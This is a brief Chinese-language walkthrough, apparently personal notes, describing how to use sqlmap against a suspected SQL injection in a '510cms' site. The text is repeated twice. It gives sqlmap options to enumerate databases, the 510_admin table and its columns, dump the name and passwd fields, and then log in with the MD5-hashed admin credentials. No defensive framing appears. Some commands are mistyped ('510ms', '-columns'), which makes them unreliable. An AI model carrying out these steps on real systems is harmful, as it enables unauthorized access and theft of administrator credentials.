前期信息收集后,怀疑存在文件sql注入漏洞
使用sqlmap扫描目标地址
扫描结果显示大概率存在进行下一步
查看存在数据库。
在查看数据库中的可疑表使用-D 510cms--tables查看
下边的admin很可疑,使用-D 510ms -T510_admin -columns 求出列名
Name 和passwd很可疑现在尝试,-D 510cms -T 510_admin -C name,passwd -dump
一般使用都用MD5加密,测试登录就可以了
前期信息收集后,怀疑存在文件sql注入漏洞
使用sqlmap扫描目标地址
扫描结果显示大概率存在进行下一步
查看存在数据库。
在查看数据库中的可疑表使用-D 510cms--tables查看
下边的admin很可疑,使用-D 510ms -T510_admin -columns 求出列名
Name 和passwd很可疑现在尝试,-D 510cms -T 510_admin -C name,passwd -dump
一般使用都用MD5加密,测试登录就可以了